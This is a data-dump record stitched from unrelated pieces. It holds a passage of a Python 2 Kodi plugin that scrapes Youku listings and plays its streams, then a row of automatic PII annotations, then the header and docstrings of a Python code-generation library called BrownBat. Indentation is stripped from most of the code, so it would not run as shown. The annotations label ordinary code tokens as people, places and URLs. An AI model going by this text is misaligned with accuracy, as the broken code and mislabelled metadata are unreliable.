xbmcplugin.setContent(int(sys.argv[1]), 'movies')
xbmcplugin.endOfDirectory(int(sys.argv[1]))
def getMovie(name,id,thumb):
if len(id)==21:
link = GetHttpData('http://www.youku.com/show_page/id_' + id + '.html')
match = re.compile('<a class="btnShow btnplayposi".*?href="http://v.youku.com/v_show/id_(.+?)\.html[^"]*"', re.DOTALL).search(link)
if not match:
match = re.compile('<div class="btnplay">.*?href="http://v.youku.com/v_show/id_(.+?)\.html[^"]*"', re.DOTALL).search(link)
if match:
            # Play the main feature
PlayVideo(name, match.group(1), thumb)
else:
            # Fall back to parsing the trailer
match = re.compile('class="btnShow btnplaytrailer".*?href="http://v.youku.com/v_show/id_(.+?)\.html[^"]*"', re.DOTALL).search(link)
if match:
PlayVideo(name, match.group(1), thumb)
else:
xbmcgui.Dialog().ok(__addonname__, '解析地址异常,可能是收费节目,无法播放')
else:
PlayVideo(name, id, thumb)
def seriesList(name,id,thumb):
url = "http://v.youku.com/v_show/id_%s.html" % (id)
data = GetHttpData(url)
#pages = re.compile('<li data="(point_reload_[0-9]+)"', re.DOTALL).findall(data)
#if len(pages)>1:
# for i in range(1,len(pages)):
# url = "http://www.youku.com/show_point/id_%s.html?dt=json&divid=%s&tab=0&__rt=1&__ro=%s" % (id, pages[i], pages[i])
# link = GetHttpData(url)
# data += link
match = re.compile('class="item(.+?)</div>', re.DOTALL).findall(data)
totalItems = len(match)
for i in range(0,len(match)):
match1 = re.compile('//v.youku.com/v_show/id_(.+?)\.html').search(match[i])
if match1:
p_id = match1.group(1)
else:
continue
#match1 = re.compile('<div class="thumb"><img .*?src="(.+?)"').search(match[i])
p_thumb = thumb
match1 = re.compile('title="(.+?)"').search(match[i])
p_name = "%s %s" % (name, match1.group(1))
p_name1 = p_name
li = xbmcgui.ListItem(p_name1, iconImage = '', thumbnailImage = p_thumb)
u = sys.argv[0]+"?mode=10&name="+urllib.quote_plus(p_name)+"&id="+urllib.quote_plus(p_id)+"&thumb="+urllib.quote_plus(p_thumb)
#li.setInfo(type = "Video", infoLabels = {"Title":p_name, "Director":p_director, "Genre":p_genre, "Plot":p_plot, "Year":p_year, "Cast":p_cast, "Tagline":p_tagline})
xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, False, totalItems)
xbmcplugin.setContent(int(sys.argv[1]), 'movies')
xbmcplugin.endOfDirectory(int(sys.argv[1]))
def progList2(name,id,page,genre,order,days):
url = 'http://list.youku.com/category/video/%s_g_%s_s_%s_d_%s_p_%s.html' % (id, genre, order, days, page)
link = GetHttpData(url)
match = re.compile('<ul class="yk-pages">(.+?)</ul>', re.DOTALL).search(link)
plist = []
if match:
match1 = re.compile('<li.+?>([0-9]+)(</a>|</span>)</li>', re.DOTALL).findall(match.group(1))
if match1:
for num, temp in match1:
if (num not in plist) and (num != page):
plist.append(num)
totalpages = int(match1[len(match1)-1][0])
else:
totalpages = 1
match = re.compile('<div class="yk-filter\s*" id="filter">(.+?)<div class="yk-filter-handle">', re.DOTALL).search(link)
if match:
listpage = match.group(1)
else:
listpage = ''
match = re.compile('<div class="yk-pack p-list"(.+?)</ul></div>', re.DOTALL).findall(link)
totalItems = len(match) + 1 + len(plist)
currpage = int(page)
genrelist = getList2(listpage, genre)
if genre == '0':
genrestr = '全部类型'
else:
genrestr = searchDict(genrelist,genre)
li = xbmcgui.ListItem(name+'(第'+str(currpage)+'/'+str(totalpages)+'页)【[COLOR FFFF0000]' + genrestr + '[/COLOR]/[COLOR FF00FF00]' + searchDict(DAYS_LIST2,days) + '[/COLOR]/[COLOR FF00FFFF]' + searchDict(ORDER_LIST2,order) + '[/COLOR]】(按此选择)')
u = sys.argv[0]+"?mode=12&name="+urllib.quote_plus(name)+"&id="+urllib.quote_plus(id)+"&genre="+urllib.quote_plus(genre)+"&order="+order+"&days="+days+"&page="+urllib.quote_plus(listpage)
xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, True, totalItems)
for i in range(0,len(match)):
match1 = re.compile('/id_(.+?).html"').search(match[i])
p_id = match1.group(1)
match1 = re.compile('<img class="quic".*?src="(.+?)"').search(match[i])
p_thumb = match1.group(1)
match1 = re.compile('<li class="title"><a .*?">(.+?)</a>').search(match[i])
p_name = match1.group(1)
p_name1 = p_name
li = xbmcgui.ListItem(str(i + 1) + '. ' + p_name1, iconImage = '', thumbnailImage = p_thumb)
u = sys.argv[0]+"?mode=10&name="+urllib.quote_plus(p_name)+"&id="+urllib.quote_plus(p_id)+"&thumb="+urllib.quote_plus(p_thumb)
#li.setInfo(type = "Video", infoLabels = {"Title":p_name, "Director":p_director, "Genre":p_genre, "Plot":p_plot, "Year":p_year, "Cast":p_cast, "Tagline":p_tagline})
xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, False, totalItems)
for num in plist:
li = xbmcgui.ListItem("... 第" + num + "页")
u = sys.argv[0]+"?mode=11&name="+urllib.quote_plus(name)+"&id="+urllib.quote_plus(id)+"&genre="+urllib.quote_plus(genre)+"&order="+order+"&days="+days+"&page="+str(num)
xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, True, totalItems)
xbmcplugin.setContent(int(sys.argv[1]), 'movies')
xbmcplugin.endOfDirectory(int(sys.argv[1]))
def selResolution(streamtypes):
ratelist = []
for i in range(0,len(streamtypes)):
        if streamtypes[i] in ('flv', 'flvhd'): ratelist.append([4, '标清', i, 'flv']) # [resolution setting value, quality label, streamtypes index]
if streamtypes[i] in ('mp4', 'mp4hd'): ratelist.append([3, '高清', i, 'mp4'])
if streamtypes[i] in ('hd2', 'hd2v2', 'mp4hd2', 'mp4hd2v2'): ratelist.append([2, '超清', i, 'hd2'])
if streamtypes[i] in ('hd3', 'hd3v2', 'mp4hd3', 'mp4hd3v2'): ratelist.append([1, '1080P', i, 'hd3'])
ratelist.sort()
if len(ratelist) > 1:
resolution = int(__addon__.getSetting('resolution'))
        if resolution == 0: # ask for the video resolution every time
list = [x[1] for x in ratelist]
sel = xbmcgui.Dialog().select('清晰度(低网速请选择低清晰度)', list)
if sel == -1:
return None, None, None, None
else:
sel = 0
while sel < len(ratelist)-1 and resolution > ratelist[sel][0]: sel += 1
else:
sel = 0
return streamtypes[ratelist[sel][2]], ratelist[sel][1], ratelist[sel][2], ratelist[sel][3]
def youku_ups(id):
res = urllib2.urlopen('https://log.mmstat.com/eg.js')
cna = res.headers['etag'][1:-1]
query = urllib.urlencode(dict(
vid = id,
ccode = '0516',
client_ip = '127.0.0.1',
utid = cna,
client_ts = time.time() / 1000,
ckey = 'PI:KEY'
))
url = 'https://ups.youku.com/ups/get.json?%s' % (query)
link = GetHttpData(url, referer='http://v.youku.com/')
json_response = simplejson.loads(link)
api_data = json_response['data']
data_error = api_data.get('error')
if data_error:
api_error_code = data_error.get('code')
api_error_msg = data_error.get('note').encode('utf-8')
dialog = xbmcgui.Dialog()
ok = dialog.ok(__addonname__,'地址解析错误(%d):\n%s' % (api_error_code,api_error_msg))
return {}
else:
return api_data
def change_cdn(url):
    # If the cdn_url starts with an IP address, it is probably youku's old CDN,
    # which rejects http requests randomly with status code > 400.
    # Changing it to the dispatcher of aliCDN does better:
    # at least it is a little more recoverable from HTTP 403.
dispatcher_url = 'vali.cp31.ott.cibntv.net'
if dispatcher_url in url:
return url
elif 'k.youku.com' in url:
return url
else:
url_seg_list = list(urlparse.urlsplit(url))
url_seg_list[1] = dispatcher_url
return urlparse.urlunsplit(url_seg_list)
def PlayVideo(name,id,thumb):
movdat = youku_ups(id)
if not movdat:
return
vid = id
    lang_select = int(__addon__.getSetting('lang_select')) # default | choose every time | auto-prefer
if lang_select != 0 and movdat.has_key('dvd') and 'audiolang' in movdat['dvd']:
langlist = movdat['dvd']['audiolang']
if lang_select == 1:
list = [x['lang'] for x in langlist]
sel = xbmcgui.Dialog().select('选择语言', list)
if sel ==-1:
return
vid = langlist[sel]['vid'].encode('utf-8')
name = '%s %s' % (name, langlist[sel]['lang'].encode('utf-8'))
else:
            lang_prefer = __addon__.getSetting('lang_prefer') # Mandarin | Cantonese
for i in range(0,len(langlist)):
if langlist[i]['lang'].encode('utf-8') == lang_prefer:
vid = langlist[i]['vid'].encode('utf-8')
name = '%s %s' % (name, langlist[i]['lang'].encode('utf-8'))
break
if vid != id:
movdat = youku_ups(vid)
if not movdat:
return
streamtypes = [stream['stream_type'].encode('utf-8') for stream in movdat['stream']]
typeid, typename, streamno, resolution = selResolution(streamtypes)
if typeid:
'''
oip = movdat['security']['ip']
ep = movdat['security']['encrypt_string']
sid, token = youkuDecoder().get_sid(ep)
play_method = int(__addon__.getSetting('play_method'))
        if play_method != 0: # m3u8 method
query = urllib.urlencode(dict(
vid=vid, ts=int(time.time()), keyframe=1, type=resolution,
ep=ep, oip=oip, ctype=12, ev=1, token=token, sid=sid,
))
cookie = ['%s=%s' % (x.name, x.value) for x in cj][0]
movurl = 'http://pl.youku.com/playlist/m3u8?%s|Cookie=%s' % (query, cookie)
        else: # default playback method
if typeid in ('mp4', 'mp4hd'):
type = 'mp4'
else:
type = 'flv'
urls = []
segs = movdat['stream'][streamno]['segs']
total = len(segs)
for no in range(0, total):
k = segs[no]['key']
if k == -1:
dialog = xbmcgui.Dialog()
ok = dialog.ok(__addonname__,'会员节目,无法播放')
return
fileid = segs[no]['fileid']
ep = youkuDecoder().generate_ep(no, fileid, sid, token)
query = urllib.urlencode(dict(
ctype = 12,
ev = 1,
K = k,
ep = urllib.unquote(ep),
oip = oip,
token = token,
yxon = 1
))
url = 'http://k.youku.com/player/getFlvPath/sid/{sid}_00/st/{container}/fileid/{fileid}?{query}'.format(
sid = sid,
container = type,
fileid = fileid,
query = query
)
link = GetHttpData(url)
json_response = simplejson.loads(link)
urls.append(json_response[0]['server'].encode('utf-8'))
movurl = 'stack://' + ' , '.join(urls)
'''
movurl = movdat['stream'][streamno]['m3u8_url']
#urls = []
#is_preview = False
#for seg in movdat['stream'][streamno]['segs']:
# if seg.get('cdn_url'):
# urls.append(change_cdn(seg['cdn_url'].encode('utf-8')))
# else:
# is_preview = True
#if not is_preview:
# movurl = 'stack://' + ' , '.join(urls)
name = '%s[%s]' % (name, typename)
listitem=xbmcgui.ListItem(name,thumbnailImage=thumb)
listitem.setInfo(type="Video",infoLabels={"Title":name})
xbmc.Player().play(movurl, listitem)
def performChanges(name,id,listpage,genre,area,year,order,days):
genrelist,arealist,yearlist = getList(listpage,id,genre,area,year)
change = False
if id == 'c_95':
str1 = '风格'
str3 = '发行'
elif id == 'c_84' or id == 'c_87':
str1 = '类型'
str3 = '出品'
else:
str1 = '类型'
str3 = '时间'
dialog = xbmcgui.Dialog()
if len(genrelist)>0:
list = [x[1] for x in genrelist]
sel = dialog.select(str1, list)
if sel != -1:
genre = genrelist[sel][0]
change = True
if len(arealist)>0:
list = [x[1] for x in arealist]
sel = dialog.select('地区', list)
if sel != -1:
area = arealist[sel][0]
change = True
if len(yearlist)>0:
list = [x[1] for x in yearlist]
sel = dialog.select(str3, list)
if sel != -1:
year = yearlist[sel][0]
change = True
list = [x[1] for x in DAYS_LIST1]
sel = dialog.select('范围', list)
if sel != -1:
days = DAYS_LIST1[sel][0]
change = True
list = [x[1] for x in ORDER_LIST1]
sel = dialog.select('排序', list)
if sel != -1:
order = ORDER_LIST1[sel][0]
change = True
if change:
progList(name,id,'1',genre,area,year,order,days)
def performChanges2(name,id,listpage,genre,order,days):
genrelist = getList2(listpage, genre)
change = False
dialog = xbmcgui.Dialog()
if len(genrelist)>0:
list = [x[1] for x in genrelist]
sel = dialog.select('类型', list)
if sel != -1:
genre = genrelist[sel][0]
change = True
list = [x[1] for x in DAYS_LIST2]
sel = dialog.select('范围', list)
if sel != -1:
days = DAYS_LIST2[sel][0]
change = True
list = [x[1] for x in ORDER_LIST2]
sel = dialog.select('排序', list)
if sel != -1:
order = ORDER_LIST2[sel][0]
change = True
if change:
progList2(name,id,'1',genre,order,days)
def get_params():
param = []
paramstring = sys.argv[2]
if len(paramstring) >= 2:
params = sys.argv[2]
cleanedparams = params.replace('?', '')
if (params[len(params) - 1] == '/'):
params = params[0:len(params) - 2]
pairsofparams = cleanedparams.split('&')
param = {}
for i in range(len(pairsofparams)):
splitparams = {}
splitparams = pairsofparams[i].split('=')
if (len(splitparams)) == 2:
param[splitparams[0]] = splitparams[1]
return param
params = get_params()
mode = None
name = ''
id = ''
genre = ''
area = ''
year = ''
order = ''
page = '1'
url = None
thumb = None
try:
thumb = urllib.unquote_plus(params["thumb"])
except:
pass
try:
url = urllib.unquote_plus(params["url"])
except:
pass
try:
page = urllib.unquote_plus(params["page"])
except:
pass
try:
order = urllib.unquote_plus(params["order"])
except:
pass
try:
days = urllib.unquote_plus(params["days"])
except:
pass
try:
year = urllib.unquote_plus(params["year"])
except:
pass
try:
area = urllib.unquote_plus(params["area"])
except:
pass
try:
genre = urllib.unquote_plus(params["genre"])
except:
pass
try:
id = urllib.unquote_plus(params["id"])
except:
pass
try:
name = urllib.unquote_plus(params["name"])
except:
pass
try:
mode = int(params["mode"])
except:
pass
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
urllib2.install_opener(opener)
if mode == None:
rootList()
elif mode == 1:
progList(name,id,page,genre,area,year,order,days)
elif mode == 2:
getMovie(name,id,thumb)
elif mode == 3:
seriesList(name,id,thumb)
elif mode == 4:
performChanges(name,id,page,genre,area,year,order,days)
elif mode == 10:
PlayVideo(name,id,thumb)
elif mode == 11:
progList2(name,id,page,genre,order,days)
elif mode == 12:
performChanges2(name,id,page,genre,order,days)
| 27,353 | [['URL', "http://list.youku.com/'"], ['URL', "http://list.youku.com/category/show/%s_g_%s_a_%s_s_%s_d_%s_r_%s_p_%s.html'"], ['URL', "http://www.youku.com/show_page/id_'"], ['URL', 'http://v.youku.com/v_show/id_%s.html"'], ['URL', 'http://www.youku.com/show_point/id_%s.html?dt=json&divid=%s&tab=0&__rt=1&__ro=%s"'], ['URL', "http://list.youku.com/category/video/%s_g_%s_s_%s_d_%s_p_%s.html'"], ['IP_ADDRESS', '127.0.0.1'], ['URL', "https://ups.youku.com/ups/get.json?%s'"], ['URL', "http://v.youku.com/'"], ['URL', "http://pl.youku.com/playlist/m3u8?%s|Cookie=%s'"], ['URL', "http://k.youku.com/player/getFlvPath/sid/{sid}_00/st/{container}/fileid/{fileid}?{query}'.format"], ['LOCATION', 'xbmcgui'], ['LOCATION', 'xbmcaddon'], ['PERSON', 'urllib2'], ['LOCATION', 'os'], ['LOCATION', 'gzip'], ['PERSON', 'Mozilla/5.0'], ['DATE_TIME', "'5','最受欢迎'"], ['PERSON', 'DAYS_LIST2'], ['DATE_TIME', '65536'], ['NRP', 'sid'], ['PERSON', 'token = e_code.split'], ['NRP', 'sid'], ['PERSON', 'LOGDEBUG'], ['URL', 'code.co'], ['URL', 'urllib2.Re'], ['URL', 'req.ad'], ['URL', 'response.re'], ['PERSON', 'c_95'], ['DATE_TIME', 'year'], ['URL', 're.com'], ['URL', 're.DO'], ['URL', 're.com'], ['URL', 're.DO'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'xbmcgui.Li'], ['DATE_TIME', 'days'], ['DATE_TIME', 'days'], ['URL', 're.com'], ['URL', 're.DO'], ['PERSON', 'match1 ='], ['URL', 're.DO'], ['PERSON', 'c_95'], ['URL', 're.DO'], ['URL', 're.com'], ['URL', 're.DO'], ['PERSON', 'genrestr = searchDict(genrelist'], ['PERSON', 'areastr'], ['PERSON', 'areastr'], ['PERSON', 'areastr'], ['PERSON', "yearstr + '"], ['URL', 'sys.ar'], ['URL', 'xbmcplugin.ad'], ['URL', 'sys.ar'], ['PERSON', 'match1 ='], ['PERSON', 'match1 = re.compile(\'<li class="title"><a'], ['PERSON', 'p_name = match1.group(1'], ['PERSON', 'match1 ='], ['URL', 'sys.ar'], ['URL', 'li.se'], ['LOCATION', 'xbmcplugin.addDirectoryItem(int(sys.argv[1'], ['PERSON', 'li'], ['PERSON', 'ListItem'], ['URL', 'sys.ar'], ['LOCATION', 'xbmcplugin.addDirectoryItem(int(sys.argv[1'], ['URL', 'xbmcplugin.ad'], ['URL', 'sys.ar'], ['URL', 're.DO'], ['URL', 're.DO'], ['URL', 're.DO'], ['URL', 'match.gr'], ['URL', 're.com'], ['URL', 're.com'], ['URL', 're.DO'], ['PERSON', "match1 = re.compile('//v.youku.com"], ['PERSON', 'match1 = re.compile(\'title="(.+?)"\').search(match[i'], ['URL', 'sys.ar'], ['URL', 'li.se'], ['LOCATION', 'xbmcplugin.addDirectoryItem(int(sys.argv[1'], ['DATE_TIME', 'days'], ['DATE_TIME', 'days'], ['URL', 're.com'], ['URL', 're.DO'], ['PERSON', 'match1 ='], ['URL', 're.DO'], ['URL', 're.DO'], ['PERSON', 'genrestr = searchDict(genrelist'], ['URL', 'sys.ar'], ['URL', 'xbmcplugin.ad'], ['URL', 'sys.ar'], ['PERSON', 'match1 ='], ['PERSON', 'match1 ='], ['PERSON', 'match1 = re.compile(\'<li class="title"><a'], ['PERSON', 'p_name = match1.group(1'], ['URL', 'sys.ar'], ['URL', 'li.se'], ['LOCATION', 'xbmcplugin.addDirectoryItem(int(sys.argv[1'], ['PERSON', 'ListItem'], ['URL', 'sys.ar'], ['LOCATION', 'xbmcplugin.addDirectoryItem(int(sys.argv[1'], ['URL', 'xbmcplugin.ad'], ['URL', 'sys.ar'], ['PERSON', 'mp4hd2v2'], ['PERSON', 'youku'], ['URL', 'vali.cp31.ott.cibntv.net'], ['URL', 'k.youku.com'], ['PERSON', 'streamtypes'], ['LOCATION', 'typename'], ['PERSON', 'streamno'], ['PERSON', 'oip=oip'], ['LOCATION', 'ctype=12'], ['PERSON', 'seg'], ['URL', 'seg.ge'], ['PERSON', 'typename'], ['PERSON', 'listitem=xbmcgui.'], ['PERSON', 'listitem'], ['DATE_TIME', 'days'], ['PERSON', 'c_95'], ['DATE_TIME', 'days'], ['DATE_TIME', 'days'], ['DATE_TIME', 'days'], ['DATE_TIME', 
"''\nyear"], ['URL', 'urllib2.HT'], ['URL', 'urllib2.in'], ['DATE_TIME', 'days'], ['DATE_TIME', 'days'], ['DATE_TIME', 'days'], ['DATE_TIME', 'days'], ['IP_ADDRESS', '::'], ['URL', 'http://v.youku.com/v_show/id_'], ['URL', 'http://v.youku.com/v_show/id_'], ['URL', 'http://v.youku.com/v_show/id_'], ['URL', "https://log.mmstat.com/eg.js'"], ['URL', 'xbmcaddon.Ad'], ['URL', 'xbmc.tr'], ['URL', 'source.re'], ['URL', 'self.ge'], ['URL', 'self.tr'], ['URL', 'self.tr'], ['URL', 'self.tr'], ['URL', 'self.tr'], ['URL', 'req.ad'], ['URL', 'response.headers.ge'], ['URL', 'StringIO.St'], ['URL', 'response.headers.ge'], ['URL', 'response.cl'], ['URL', 'code.co'], ['URL', 're.com'], ['URL', 're.com'], ['URL', 'httpdata.de'], ['URL', 're.com'], ['URL', 'match.gr'], ['URL', 're.com'], ['URL', 're.DO'], ['URL', 're.com'], ['URL', 'match.gr'], ['URL', 'match.gr'], ['URL', 're.com'], ['URL', 're.DO'], ['URL', 're.com'], ['URL', 'match.gr'], ['URL', 'match.gr'], ['URL', 're.com'], ['URL', 're.DO'], ['URL', 're.com'], ['URL', 'match.gr'], ['URL', 'match.gr'], ['URL', 're.com'], ['URL', 're.DO'], ['URL', 're.com'], ['URL', 'match.gr'], ['URL', 'match.gr'], ['URL', 'match0.gr'], ['URL', 'xbmcplugin.ad'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 're.com'], ['URL', 're.DO'], ['URL', 'match.gr'], ['URL', 're.com'], ['URL', 'match.gr'], ['URL', 're.com'], ['URL', 'xbmcgui.Li'], ['URL', 're.com'], ['URL', 'match1.gr'], ['URL', 're.com'], ['URL', 'match1.gr'], ['URL', 're.com'], ['URL', 'match1.gr'], ['URL', 're.com'], ['URL', 'match1.gr'], ['URL', 're.com'], ['URL', 'match1.gr'], ['URL', 'xbmcgui.Li'], ['URL', 'xbmcplugin.ad'], ['URL', 'sys.ar'], ['URL', 'xbmcgui.Li'], ['URL', 'xbmcplugin.se'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 're.com'], ['URL', 're.com'], ['URL', 'match.gr'], ['URL', 're.com'], ['URL', 're.DO'], ['URL', 're.com'], ['URL', 'v.youku.com/v_show/id_'], ['URL', 'match1.gr'], ['URL', 're.com'], ['URL', 're.com'], ['URL', 'match1.gr'], ['URL', 'xbmcgui.Li'], ['URL', 'xbmcplugin.ad'], ['URL', 'sys.ar'], ['URL', 'xbmcplugin.se'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 're.com'], ['URL', 're.DO'], ['URL', 'match.gr'], ['URL', 're.com'], ['URL', 'match.gr'], ['URL', 're.com'], ['URL', 'xbmcgui.Li'], ['URL', 're.com'], ['URL', 'match1.gr'], ['URL', 're.com'], ['URL', 'match1.gr'], ['URL', 're.com'], ['URL', 'match1.gr'], ['URL', 'xbmcgui.Li'], ['URL', 'xbmcplugin.ad'], ['URL', 'sys.ar'], ['URL', 'xbmcgui.Li'], ['URL', 'xbmcplugin.se'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'ratelist.so'], ['URL', 'data.ge'], ['URL', 'error.ge'], ['URL', 'error.ge'], ['URL', 'x.na'], ['URL', 'x.va'], ['URL', 'xbmcgui.Li'], ['URL', 'listitem.se'], ['URL', 'xbmc.Pl'], ['URL', 'dialog.se'], ['URL', 'dialog.se'], ['URL', 'dialog.se'], ['URL', 'dialog.se'], ['URL', 'dialog.se'], ['URL', 'dialog.se'], ['URL', 'dialog.se'], ['URL', 'dialog.se'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'params.re'], ['URL', 'cookielib.Co']] |
40 |
# Copyright 2014 Douglas RAILLARD
#
# This file is part of BrownBat.
#
# BrownBat is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# BrownBat is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with BrownBat. If not, see <http://www.gnu.org/licenses/>.
"""
.. moduleauthor:: Douglas RAILLARD dummy@email.com
This module mostly provides base classes intended to be subclassed for building
language-specific source code generation libraries.
They implement functionality related to operator overloading that can be used in any language.
Every class representing source code constructs are known as node.
The following helper functions are provided:
* :func:`listify`: create a list from an iterable or a single element.
* :func:`format_string`: format a string according to the given convention (camel case, upper case, etc.).
* :func:`strip_starting_blank_lines`: strip the blank lines at the beginning of a multiline string.
The following classes are provided:
* :class:`Indentation`: manage the indentation level in the code generator.
* :class:`NonIterable`: inheriting that class allows a class which can be considered as iterable to be considered as non-iterable by :func:`listify`.
* :class:`NodeMeta`: metaclass of all classes representing some source code constructs.
* :class:`NodeABC`: abstract base class of all classes representing some source code constructs.
* :class:`NodeBase`: base class of almost all classes representing some source code constructs.
* :class:`NodeAttrProxy`: proxy class that forwards the calls to the :class:`NodeABC` API to an attribute which is itself a :class:`NodeABC`. It implements composition.
* :class:`EnsureNode`: descriptor used to build attributes that guarantee that they contain an instance of NodeABC.
* :class:`DelegatedAttribute`: descriptor used to delegate an attribute to another instance which has the given attribute name.
* :class:`NodeViewBase`: base class for class representing a view of another node (for example a variable declaration is a view of a variable).
* :class:`PhantomNode`: class which can be used as an empty placeholder when a node is required.
* :class:`NodeContainerBase`: base class for node containers. It mostly implements operator overloading.
* :class:`TokenListABC`: abstract base class for token lists. This is a node that can contain a list of any object that can be used as a string, and concatenates them when printed.
* :class:`DelegatedTokenListBase`: base class for a token list that uses a specific attribute to really hold the token list instance (thus implementing composition instead of inheritance).
* :class:`TokenListBase`: base class for a token list.
* :class:`IndentedTokenListBase`: base class for a token list which indents its content when printed.
* :class:`IndentedDelegatedTokenListBase`: mix of :class:`IndentedTokenListBase` and :class:`DelegatedTokenListBase`.
* :class:`BacktraceBase`: base class for special token list that output a simplified backtrace of Python code that was used to build the instance. Useful when trying to debug the code generator.
"""
import collections
import numbers
import abc
import inspect
import copy
import functools
import os
def listify(iterable_or_single_elem):
"""Create a list out of:
* an iterable object: the result will be like ``list(iterable_or_single_elem)``
* a object which cannot be iterated over: return a list with only one item (just the object)
* an object which is iterable, but also a subclass of :class:`NonIterable`:
return a list with just the object, as if it was not iterable.
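
    A few illustrative cases::

        >>> listify(None)
        []
        >>> listify('hello')
        ['hello']
        >>> listify((1, 2, 3))
        [1, 2, 3]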
"""
if iterable_or_single_elem is None:
return []
# We exclude iterables such as strings or NonIterable (StmtContainer for example)
# because we want to keep them as one object and not split them
if isinstance(iterable_or_single_elem, collections.Iterable) \
and not isinstance(iterable_or_single_elem, (str, NonIterable)):
return list(iterable_or_single_elem)
else:
return [iterable_or_single_elem]
def format_string(string, style, separator="_"):
""" Format a string according to a convention.
    It can be used to write identifier names in a unified format before applying a naming convention.
    :param string: the string to be modified. It must be in a format where the word separator is always the same.
:param style: the convention. It can be one of:
* UpperCamelCase
* lowerCamelCase
* lower_underscore_case
* UPPER_UNDERSCORE_CASE
    :param separator: the word separator used to split the words apart before applying the convention.
It defaults to '_'.
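
    For example::

        >>> format_string('hello_world', 'UpperCamelCase')
        'HelloWorld'
        >>> format_string('hello_world', 'lowerCamelCase')
        'helloWorld'
        >>> format_string('hello_world', 'UPPER_UNDERSCORE_CASE')
        'HELLO_WORLD'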
"""
if isinstance(string, collections.Iterable) and not isinstance(string, (str, NonIterable)):
token_list = string
else:
token_list = str(string).split(separator)
    # If there is only one token in the list and it is an empty
    # string, we don't want to replace it with a separator
if len(token_list) != 1:
for i, token in enumerate(token_list):
if not token:
token_list[i] = separator
if style == "UpperCamelCase":
return "".join(token.capitalize() for token in token_list)
if style == "lowerCamelCase":
first_word = token_list[0].lower()
remain_list = token_list[1:]
return first_word+"".join(token.capitalize() for token in remain_list)
if style == "lower_underscore_case":
return "_".join(token.lower() for token in token_list)
if style == "UPPER_UNDERSCORE_CASE":
return "_".join(token.upper() for token in token_list)
def strip_starting_blank_lines(snippet):
"""Strip blank lines at the beginning of a multiline string."""
last_new_line_pos = 0
for position, char in enumerate(snippet):
if char=='\n':
last_new_line_pos = position
elif char!='\t' and char!=' ' and char!='\v':
break
# Only keep one new line at the beginning, to avoid multiple blank lines
return snippet[last_new_line_pos:]
class Indentation:
"""This class manages the indentation in the source code output.
Instances can be printed to give the string to put at the beginning of a new indented line.
>>> idt = Indentation()
>>> idt.indent()
>>> print('*'+str(idt)+'indented Hello World')
    *    indented Hello World
"""
# Default indentation style (4 spaces)
    indentation_string = '    '
@classmethod
def ensure_idt(cls, idt):
"""Create a new indentation instance if *idt* is None,
or return *idt* if it is already an :class:`Indentation` instance.
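
        For example::

            >>> Indentation.ensure_idt(3).indentation_level
            3
            >>> isinstance(Indentation.ensure_idt(None), Indentation)
            True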
"""
if idt is None:
idt = cls()
elif isinstance(idt, numbers.Integral):
idt = cls(idt)
elif isinstance(idt, str):
idt = cls(indentator=idt)
return idt
def __init__(self, level=0, indentator=None):
"""
:param level: the initial indentation level
:type level: int
:param indentator: the string used to display indentation.
It defaults to the class attribute *indentation_string* which is four spaces.
"""
self.indentation_level = level
        # If an indentation string is given, override the class-wide default with
        # an instance-local string
if indentator is not None:
self.indentation_string = indentator
def indent(self, level=1):
"""Increase the indentation level by *level* levels."""
self.indentation_level += level
def dedent(self, level=1):
"""Decrease the indentation level by *level* levels."""
self.indentation_level -= level
def __str__(self):
"""Return the string to be used at the beginning of a line to display the indentation."""
return self.indentation_string * self.indentation_level
class NonIterable:
""" Inheriting from this class will prevent a class to be considered as
:class:`collections.Iterable` by :func:`listify`.
"""
pass
class NodeMeta(abc.ABCMeta):
"""Meta class used for every node, i.e. every class representing source code constructs.
    Currently, it only does a bit of black magic on the :meth:`NodeABC.inline_str` and :meth:`NodeABC.self_inline_str` methods:
    it creates a wrapper around them that calls *inline_str_filter*, if it exists, on their return string, to
    let the user apply some naming convention at the latest stage.
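
    For example, a node class can install a filter to enforce a naming
    convention at the very last moment (an illustrative sketch; the filter
    simply upper-cases the output here)::

        class UpperToken(TokenListBase):
            def inline_str_filter(self, string):
                return string.upper()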
"""
def __new__(meta, name, bases, dct):
# Add automatic 'inheritance' for __format_string class attribute
attr_name = '_'+name+'__format_string'
if bases and not attr_name in dct:
try:
dct[attr_name] = bases[0].__dict__['_'+bases[0].__name__+'__format_string']
except KeyError:
pass
# Wrap inline_str function to allow automatic filtering on its output
def make_wrapper(wrapped_fun):
@functools.wraps(wrapped_fun)
def wrapper_fun(self, *args, **kwargs):
result = wrapped_fun(self, *args, **kwargs)
try:
filter_fun = self.inline_str_filter
except AttributeError:
# Just return the string as is, no filter hook is installed
return result
else:
# Call the filter on the resulting string
return filter_fun(result)
return wrapper_fun
for stringify_fun_name in ['inline_str', 'self_inline_str']:
if stringify_fun_name in dct:
wrapped_fun = dct[stringify_fun_name]
dct[stringify_fun_name] = make_wrapper(wrapped_fun)
return super().__new__(meta, name, bases, dct)
class NodeABC(metaclass=NodeMeta):
"""This class is an Abstract Base Class describing the most basic API evey node should conform to."""
__format_string = ''
@abc.abstractmethod
def inline_str(self, idt=None):
"""This function is called to print the content of the node in an inline context.
This can be for example when the node is printed inside an expression.
This function should not try to print a preceding new line or indentation string.
"""
pass
@abc.abstractmethod
def freestanding_str(self, idt=None):
"""This function is called to print the content of the node in a freestanding context.
        This can be for example when the node is printed directly in the source file.
        This function should print the preceding new line and indentation if the source code construct
        requires it.
"""
pass
@abc.abstractmethod
def adopt_node(self, child):
pass
class NodeAttrProxy(NodeABC):
